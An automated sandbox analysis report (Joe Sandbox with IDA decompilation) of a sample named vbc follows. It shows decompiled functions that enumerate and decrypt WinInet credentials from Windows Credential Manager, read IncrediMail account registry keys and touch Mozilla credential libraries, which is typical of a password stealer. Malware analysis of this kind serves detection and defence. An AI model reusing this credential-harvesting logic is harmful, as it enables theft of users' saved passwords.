                                                              				intOrPtr _v1116;
                                                              				intOrPtr _v1120;
                                                              				intOrPtr _v1124;
                                                              				intOrPtr _v1128;
                                                              				intOrPtr _v1132;
                                                              				long* _v1136;
                                                              				wchar_t* _v1140;
                                                              				wchar_t* _v1144;
                                                              				intOrPtr _v1148;
                                                              				char _v1152;
                                                              				intOrPtr _v1156;
                                                              				char _v1160;
                                                              				void* _v1164;
                                                              				void* _v1168;
                                                              				int _v1172;
                                                              				intOrPtr _v1176;
                                                              				char _v1180;
                                                              				char _v1184;
                                                              				signed int _v1188;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t76;
                                                              				int _t83;
                                                              				wchar_t* _t109;
                                                              				wchar_t* _t110;
                                                              				signed int _t120;
                                                              				int _t126;
                                                              				void* _t129;
                                                              				intOrPtr _t134;
                                                              				signed int _t140;
                                                              				void* _t142;
                                                              				void* _t143;
                                                              				void* _t144;
                                                              
                                                              				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                              				_push(_t129);
                                                              				_v1108 = 0;
                                                              				_v1104 = 0;
                                                              				if(E00404647( &_v1108, _t129, __eflags) != 0) {
                                                              					_v1184 = 0;
                                                              					_v1180 = 0;
                                                              					if(_v1088 == 0) {
                                                              						_t76 = 0;
                                                              						__eflags = 0;
                                                              					} else {
                                                              						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                              					}
                                                              					if(_t76 != 0) {
                                                              						_t120 = 9;
                                                              						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                              						_t143 = _t142 + 0xc;
                                                              						_v1172 = wcslen( &_v1080);
                                                              						_v1176 = 1;
                                                              						_v1188 = 0;
                                                              						if(_v1180 > 0) {
                                                              							while(_v1176 != 0) {
                                                              								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                              								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                              								_t143 = _t143 + 0xc;
                                                              								if(_t83 == 0) {
                                                              									do {
                                                              										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                              										 *(_t83 + 0x417968) =  *_t25 << 2;
                                                              										_t83 = _t83 + 2;
                                                              										_t152 = _t83 - 0x4a;
                                                              									} while (_t83 < 0x4a);
                                                              									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                              									_t139 =  &_v532;
                                                              									_v1160 = 0x4a;
                                                              									_v1156 = 0x417968;
                                                              									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                              									E004046D7( &_v532);
                                                              									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                              										_v1044 = 0;
                                                              										memset( &_v1042, 0, 0x1fe);
                                                              										_t126 = _v1168;
                                                              										_t144 = _t143 + 0xc;
                                                              										if(_t126 > 0x1fa) {
                                                              											_t126 = 0x1fa;
                                                              										}
                                                              										memcpy( &_v1044, _v1164, _t126);
                                                              										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                              										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                              										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                              										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                              										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                              										_v1144 =  *(_t134 + 8);
                                                              										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                              										_t109 =  &_v1044;
                                                              										_v534 = 0;
                                                              										_v1140 = _t109;
                                                              										_v1136 = 0x4125f4;
                                                              										_t110 = wcschr(_t109, 0x3a);
                                                              										_t143 = _t144 + 0x14;
                                                              										if(_t110 != 0) {
                                                              											 *_t110 = 0;
                                                              											_v1136 =  &(_t110[0]);
                                                              										}
                                                              										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                              										LocalFree(_v1168);
                                                              									}
                                                              									E004047F1( &_v532);
                                                              								}
                                                              								_v1188 = _v1188 + 1;
                                                              								if(_v1188 < _v1180) {
                                                              									continue;
                                                              								}
                                                              								goto L18;
                                                              							}
                                                              						}
                                                              						L18:
                                                              						_v1096(_v1184);
                                                              					}
                                                              				}
                                                              				return E004046C2( &_v1108);
                                                              			}















































                                                              0x00407661
                                                              0x0040766b
                                                              0x00407670
                                                              0x00407674
                                                              0x0040767f
                                                              0x00407689
                                                              0x0040768d
                                                              0x00407691
                                                              0x004076a8
                                                              0x004076a8
                                                              0x00407693
                                                              0x0040769f
                                                              0x0040769f
                                                              0x004076ac
                                                              0x004076b4
                                                              0x004076c3
                                                              0x004076c3
                                                              0x004076cf
                                                              0x004076d3
                                                              0x004076db
                                                              0x004076df
                                                              0x004076e5
                                                              0x004076f7
                                                              0x00407709
                                                              0x0040770e
                                                              0x00407713
                                                              0x00407719
                                                              0x00407719
                                                              0x00407724
                                                              0x0040772c
                                                              0x0040772d
                                                              0x0040772d
                                                              0x00407735
                                                              0x0040773c
                                                              0x00407743
                                                              0x0040774b
                                                              0x00407753
                                                              0x00407757
                                                              0x00407763
                                                              0x00407795
                                                              0x0040779d
                                                              0x004077a2
                                                              0x004077ab
                                                              0x004077b0
                                                              0x004077b2
                                                              0x004077b2
                                                              0x004077c1
                                                              0x004077c9
                                                              0x004077d0
                                                              0x004077d7
                                                              0x004077de
                                                              0x004077e5
                                                              0x004077ec
                                                              0x004077f3
                                                              0x004077f7
                                                              0x00407801
                                                              0x00407809
                                                              0x0040780d
                                                              0x00407815
                                                              0x0040781a
                                                              0x0040781f
                                                              0x00407821
                                                              0x00407827
                                                              0x00407827
                                                              0x0040783b
                                                              0x0040783f
                                                              0x0040783f
                                                              0x0040784c
                                                              0x0040784c
                                                              0x00407851
                                                              0x0040785d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040785d
                                                              0x004076e5
                                                              0x00407863
                                                              0x00407867
                                                              0x00407867
                                                              0x004076ac
                                                              0x0040787a

                                                              APIs
                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                              • wcslen.MSVCRT ref: 004076C5
                                                              • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                              • memset.MSVCRT ref: 0040779D
                                                              • memcpy.MSVCRT ref: 004077C1
                                                              • wcschr.MSVCRT ref: 00407815
                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID: J$Microsoft_WinInet$hyA
                                                              • API String ID: 2413121283-319027496
                                                              • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                              • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                              • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                              • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
                                                              				void* _v8;
                                                              				int _v12;
                                                              				int _v16;
                                                              				void _v271;
                                                              				char _v272;
                                                              				void _v527;
                                                              				char _v528;
                                                              				void _v827;
                                                              				char _v828;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				long _t40;
                                                              				void* _t44;
                                                              				void* _t55;
                                                              				void* _t60;
                                                              				void* _t66;
                                                              				void* _t67;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				void* _t73;
                                                              				void* _t74;
                                                              				void* _t77;
                                                              
                                                              				_t77 = __fp0;
                                                              				_t66 = __ecx;
                                                              				_t67 = __eax;
                                                              				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
                                                              				_t72 = _t71 + 0xc;
                                                              				if(_t40 == 0) {
                                                              					_v12 = 0;
                                                              					_v272 = 0;
                                                              					memset( &_v271, 0, 0xff);
                                                              					_t44 = E0040EC05(_a4, 0,  &_v272);
                                                              					_t73 = _t72 + 0x18;
                                                              					while(_t44 == 0) {
                                                              						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                              						_v828 = 0;
                                                              						memset( &_v827, 0, 0x12b);
                                                              						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                              						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
                                                              						_t74 = _t73 + 0x38;
                                                              						if(_t55 == 0) {
                                                              							_v16 = 0;
                                                              							_v528 = 0;
                                                              							memset( &_v527, 0, 0xff);
                                                              							_t60 = E0040EC05(_v8, 0,  &_v528);
                                                              							_t74 = _t74 + 0x18;
                                                              							while(_t60 == 0) {
                                                              								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                              								_v16 = _v16 + 1;
                                                              								_t60 = E0040EC05(_v8, _v16,  &_v528);
                                                              								_t74 = _t74 + 0xc;
                                                              							}
                                                              							RegCloseKey(_v8);
                                                              						}
                                                              						_v12 = _v12 + 1;
                                                              						_t44 = E0040EC05(_a4, _v12,  &_v272);
                                                              						_t73 = _t74 + 0xc;
                                                              					}
                                                              					_t40 = RegCloseKey(_a4);
                                                              				}
                                                              				 *((char*)(_t67 + 0xa9c)) = 0;
                                                              				return _t40;
                                                              			}

























                                                              0x00402fc2
                                                              0x00402fc2
                                                              0x00402fcd
                                                              0x00402fdb
                                                              0x00402fe0
                                                              0x00402fe7
                                                              0x00402ffc
                                                              0x00402fff
                                                              0x00403005
                                                              0x00403015
                                                              0x0040301a
                                                              0x00403101
                                                              0x0040303a
                                                              0x0040304c
                                                              0x00403052
                                                              0x0040306a
                                                              0x0040307d
                                                              0x00403082
                                                              0x00403087
                                                              0x00403092
                                                              0x00403095
                                                              0x0040309b
                                                              0x004030ab
                                                              0x004030b0
                                                              0x004030dc
                                                              0x004030bf
                                                              0x004030c4
                                                              0x004030d4
                                                              0x004030d9
                                                              0x004030d9
                                                              0x004030e3
                                                              0x004030e3
                                                              0x004030e9
                                                              0x004030f9
                                                              0x004030fe
                                                              0x004030fe
                                                              0x0040310c
                                                              0x00403112
                                                              0x00403113
                                                              0x0040311c

                                                              APIs
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              • memset.MSVCRT ref: 00403005
                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                              • memset.MSVCRT ref: 00403052
                                                              • sprintf.MSVCRT ref: 0040306A
                                                              • memset.MSVCRT ref: 0040309B
                                                              • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                              • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$Close$EnumOpensprintf
                                                              • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                              • API String ID: 3672803090-3168940695
                                                              • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                              • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                              • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                              • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                              				char* _v0;
                                                              				int _v4;
                                                              				int _t39;
                                                              				char* _t49;
                                                              				void* _t51;
                                                              				int _t64;
                                                              				signed int _t70;
                                                              				signed int _t71;
                                                              
                                                              				_t59 = __ecx;
                                                              				_t71 = _t70 & 0xfffffff8;
                                                              				E004118A0(0x204c, __ecx);
                                                              				_t39 = GetMenuItemCount(_a8.cbSize);
                                                              				_a4 = _t39;
                                                              				_v4 = 0;
                                                              				if(_t39 <= 0) {
                                                              					L15:
                                                              					return _t39;
                                                              				} else {
                                                              					do {
                                                              						memset( &_a57, 0, 0x1000);
                                                              						_t71 = _t71 + 0xc;
                                                              						_a44 =  &_a56;
                                                              						_a8.cbSize = 0x30;
                                                              						_a12 = 0x36;
                                                              						_a48 = 0x1000;
                                                              						_a56 = 0;
                                                              						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                              							goto L14;
                                                              						}
                                                              						if(_a56 == 0) {
                                                              							L12:
                                                              							_t80 = _a28;
                                                              							if(_a28 != 0) {
                                                              								_push(0);
                                                              								_push(_a28);
                                                              								_push(_a4);
                                                              								E00407A64(_t59, _t80);
                                                              								_t71 = _t71 + 0xc;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              						_t64 = _a24;
                                                              						_a4160 = 0;
                                                              						memset( &_a4161, 0, 0x1000);
                                                              						_t49 = strchr( &_a56, 9);
                                                              						_t71 = _t71 + 0x14;
                                                              						_v0 = _t49;
                                                              						if(_a28 != 0) {
                                                              							if(_a12 == 0) {
                                                              								 *0x4171b4 =  *0x4171b4 + 1;
                                                              								_t64 =  *0x4171b4 + 0x11558;
                                                              								__eflags = _t64;
                                                              							} else {
                                                              								_t64 = _v4 + 0x11171;
                                                              							}
                                                              						}
                                                              						_t51 = E00407D89(_t64,  &_a4160);
                                                              						_pop(_t59);
                                                              						if(_t51 != 0) {
                                                              							if(_v0 != 0) {
                                                              								strcat( &_a4160, _v0);
                                                              								_pop(_t59);
                                                              							}
                                                              							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                              						}
                                                              						goto L12;
                                                              						L14:
                                                              						_v4 = _v4 + 1;
                                                              						_t39 = _v4;
                                                              					} while (_t39 < _a4);
                                                              					goto L15;
                                                              				}
                                                              			}











                                                              0x00407a64
                                                              0x00407a67
                                                              0x00407a6f
                                                              0x00407a7a
                                                              0x00407a84
                                                              0x00407a88
                                                              0x00407a8c
                                                              0x00407bb2
                                                              0x00407bb8
                                                              0x00407a92
                                                              0x00407a97
                                                              0x00407a9e
                                                              0x00407aa3
                                                              0x00407aaa
                                                              0x00407ab9
                                                              0x00407ac4
                                                              0x00407acc
                                                              0x00407ad0
                                                              0x00407adc
                                                              0x00000000
                                                              0x00000000
                                                              0x00407ae6
                                                              0x00407b8a
                                                              0x00407b8a
                                                              0x00407b8e
                                                              0x00407b90
                                                              0x00407b91
                                                              0x00407b95
                                                              0x00407b98
                                                              0x00407b9d
                                                              0x00407b9d
                                                              0x00000000
                                                              0x00407b8e
                                                              0x00407aec
                                                              0x00407afa
                                                              0x00407b01
                                                              0x00407b0d
                                                              0x00407b12
                                                              0x00407b19
                                                              0x00407b1d
                                                              0x00407b22
                                                              0x00407b30
                                                              0x00407b3c
                                                              0x00407b3c
                                                              0x00407b24
                                                              0x00407b28
                                                              0x00407b28
                                                              0x00407b22
                                                              0x00407b4b
                                                              0x00407b53
                                                              0x00407b54
                                                              0x00407b5a
                                                              0x00407b68
                                                              0x00407b6e
                                                              0x00407b6e
                                                              0x00407b84
                                                              0x00407b84
                                                              0x00000000
                                                              0x00407ba0
                                                              0x00407ba0
                                                              0x00407ba4
                                                              0x00407ba8
                                                              0x00000000
                                                              0x00407a97

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 1757351179-3849865405
                                                              • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                              • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                              • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                              • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                              • memcpy.MSVCRT ref: 0040EA04
                                                              • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                              Strings
                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                              • API String ID: 1640410171-2022683286
                                                              • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                              • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                              • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                              • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E004081B5(void* __eflags, char* _a4) {
                                                              				void* __esi;
                                                              				void* _t3;
                                                              				int _t6;
                                                              
                                                              				_t3 = E0040614B(_a4);
                                                              				if(_t3 != 0) {
                                                              					strcpy(0x4171b8, _a4);
                                                              					strcpy(0x4172c0, "general");
                                                              					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                              					asm("sbb eax, eax");
                                                              					 *0x417304 =  ~(_t6 - 1) + 1;
                                                              					E00407DC1(0x417308, "charset", 0x3f);
                                                              					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                              					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                              				}
                                                              				return _t3;
                                                              			}






                                                              0x004081b9
                                                              0x004081c1
                                                              0x004081cf
                                                              0x004081df
                                                              0x004081f0
                                                              0x004081f9
                                                              0x00408208
                                                              0x0040820d
                                                              0x0040821e
                                                              0x00000000
                                                              0x0040823b
                                                              0x0040823c

                                                              APIs
                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                              • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfilestrcpy$AttributesFileString
                                                              • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 185930432-2094606381
                                                              • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                              • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                              • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                              • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040DEA9() {
                                                              				int _t3;
                                                              				struct HINSTANCE__* _t5;
                                                              				struct HINSTANCE__* _t6;
                                                              				struct HINSTANCE__* _t9;
                                                              
                                                              				_t6 = GetModuleHandleA("nss3.dll");
                                                              				_t5 = GetModuleHandleA("sqlite3.dll");
                                                              				_t3 = GetModuleHandleA("mozsqlite3.dll");
                                                              				_t9 = _t3;
                                                              				if(_t6 != 0) {
                                                              					_t3 = FreeLibrary(_t6);
                                                              				}
                                                              				if(_t5 != 0) {
                                                              					_t3 = FreeLibrary(_t5);
                                                              				}
                                                              				if(_t9 != 0) {
                                                              					return FreeLibrary(_t9);
                                                              				}
                                                              				return _t3;
                                                              			}







                                                              0x0040debf
                                                              0x0040dec8
                                                              0x0040deca
                                                              0x0040ded4
                                                              0x0040ded6
                                                              0x0040ded9
                                                              0x0040ded9
                                                              0x0040dedd
                                                              0x0040dee0
                                                              0x0040dee0
                                                              0x0040dee4
                                                              0x00000000
                                                              0x0040dee7
                                                              0x0040deed

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(nss3.dll,74B057D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                              • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHandleLibraryModule
                                                              • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                              • API String ID: 662261464-3550686275
                                                              • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                              • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                              • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                              • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E0040E172(char* __edi, char* __esi) {
                                                              				void _v267;
                                                              				char _v268;
                                                              				char* _t15;
                                                              				void* _t38;
                                                              				char* _t48;
                                                              
                                                              				_t49 = __esi;
                                                              				_t48 = __edi;
                                                              				if(__esi[1] != 0x3a) {
                                                              					_t15 = strchr( &(__esi[2]), 0x3a);
                                                              					if(_t15 == 0) {
                                                              						_t38 = E004069D2(0, "\\systemroot");
                                                              						if(_t38 < 0) {
                                                              							if( *__esi != 0x5c) {
                                                              								strcpy(__edi, __esi);
                                                              							} else {
                                                              								_v268 = 0;
                                                              								memset( &_v267, 0, 0x104);
                                                              								E00406325( &_v268);
                                                              								memcpy(__edi,  &_v268, 2);
                                                              								__edi[2] = 0;
                                                              								strcat(__edi, __esi);
                                                              							}
                                                              						} else {
                                                              							_v268 = 0;
                                                              							memset( &_v267, 0, 0x104);
                                                              							E00406325( &_v268);
                                                              							strcpy(__edi,  &_v268);
                                                              							_t8 =  &(_t49[0xb]); // 0xb
                                                              							strcat(__edi, _t38 + _t8);
                                                              						}
                                                              						L11:
                                                              						return _t48;
                                                              					}
                                                              					_push(_t15 - 1);
                                                              					L4:
                                                              					strcpy(_t48, ??);
                                                              					goto L11;
                                                              				}
                                                              				_push(__esi);
                                                              				goto L4;
                                                              			}








                                                              0x0040e172
                                                              0x0040e172
                                                              0x0040e17f
                                                              0x0040e18a
                                                              0x0040e193
                                                              0x0040e1b3
                                                              0x0040e1b8
                                                              0x0040e200
                                                              0x0040e249
                                                              0x0040e202
                                                              0x0040e210
                                                              0x0040e217
                                                              0x0040e223
                                                              0x0040e232
                                                              0x0040e239
                                                              0x0040e23d
                                                              0x0040e242
                                                              0x0040e1ba
                                                              0x0040e1c8
                                                              0x0040e1cf
                                                              0x0040e1db
                                                              0x0040e1e8
                                                              0x0040e1ed
                                                              0x0040e1f3
                                                              0x0040e1f8
                                                              0x0040e251
                                                              0x0040e254
                                                              0x0040e254
                                                              0x0040e196
                                                              0x0040e197
                                                              0x0040e198
                                                              0x00000000
                                                              0x0040e19e
                                                              0x0040e181
                                                              0x00000000

                                                              APIs
                                                              • strchr.MSVCRT ref: 0040E18A
                                                              • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                              • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                              • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                              • memset.MSVCRT ref: 0040E1CF
                                                                • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                              • memset.MSVCRT ref: 0040E217
                                                              • memcpy.MSVCRT ref: 0040E232
                                                              • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
